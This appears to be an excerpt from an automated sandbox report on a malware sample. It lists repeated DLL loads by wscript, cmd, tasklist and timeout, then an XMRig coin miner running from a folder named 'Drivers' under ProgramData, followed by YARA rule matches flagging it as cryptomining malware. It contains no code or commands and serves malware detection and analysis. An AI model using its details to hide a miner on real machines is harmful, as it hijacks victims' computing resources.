Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: propsys.dll			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: edputil.dll			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: urlmon.dll			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: iertutil.dll			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: srvcli.dll			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: netutils.dll			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: windows.staterepositoryps.dll			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: policymanager.dll			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: msvcp110_win.dll			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wintypes.dll			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: appresolver.dll			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: bcp47langs.dll			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: slc.dll			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: userenv.dll			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: sppc.dll			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: onecorecommonproxystub.dll			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: onecoreuapcommonproxystub.dll			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: pcacli.dll			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: mpr.dll			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: sfc_os.dll			Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll			Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll			Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll			Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll			Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll			Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll			Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll			Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll			Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll			Jump to behavior
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll			Jump to behavior
Source: C:\Windows\System32\timeout.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll			Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll			Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll			Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll			Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll			Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll			Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll			Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll			Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll			Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll			Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll			Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll			Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll			Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll			Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll			Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll			Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll			Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll
Source: C:\ProgramData\Drivers\xmrig.exe	Section loaded: iphlpapi.dll
Source: C:\ProgramData\Drivers\xmrig.exe	Section loaded: userenv.dll
Source: C:\ProgramData\Drivers\xmrig.exe	Section loaded: cryptbase.dll
Source: C:\ProgramData\Drivers\xmrig.exe	Section loaded: powrprof.dll
Source: C:\ProgramData\Drivers\xmrig.exe	Section loaded: umpdc.dll
Source: C:\ProgramData\Drivers\xmrig.exe	Section loaded: uxtheme.dll
Source: C:\ProgramData\Drivers\xmrig.exe	Section loaded: mswsock.dll
Source: C:\ProgramData\Drivers\xmrig.exe	Section loaded: dhcpcsvc6.dll
Source: C:\ProgramData\Drivers\xmrig.exe	Section loaded: dhcpcsvc.dll
Source: C:\ProgramData\Drivers\xmrig.exe	Section loaded: dnsapi.dll
Source: C:\ProgramData\Drivers\xmrig.exe	Section loaded: napinsp.dll
Source: C:\ProgramData\Drivers\xmrig.exe	Section loaded: pnrpnsp.dll
Source: C:\ProgramData\Drivers\xmrig.exe	Section loaded: wshbth.dll
Source: C:\ProgramData\Drivers\xmrig.exe	Section loaded: nlaapi.dll
Source: C:\ProgramData\Drivers\xmrig.exe	Section loaded: winrnr.dll
Source: C:\ProgramData\Drivers\xmrig.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\Drivers\xmrig.exe	Section loaded: explorerframe.dll
Source: C:\ProgramData\Drivers\xmrig.exe	Section loaded: cryptsp.dll
Source: C:\ProgramData\Drivers\xmrig.exe	Section loaded: rsaenh.dll
Source: C:\ProgramData\Drivers\xmrig.exe	Section loaded: rasadhlp.dll
Source: C:\ProgramData\Drivers\xmrig.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\timeout.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll
Source: C:\Windows\System32\timeout.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll
Source: C:\Windows\System32\timeout.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll
Source: C:\Windows\System32\timeout.exe	Section loaded: version.dll
Source: C:\Windows\System32\timeout.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll
Source: C:\Windows\System32\timeout.exe	Section loaded: version.dll
Source: C:\Windows\System32\timeout.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll

Source: 15.0.xmrig.exe.7ff61ae40000.0.unpack, type: UNPACKEDPE	Matched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
Source: 15.0.xmrig.exe.7ff61ae40000.0.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 15.0.xmrig.exe.7ff61ae40000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 15.0.xmrig.exe.7ff61ae40000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
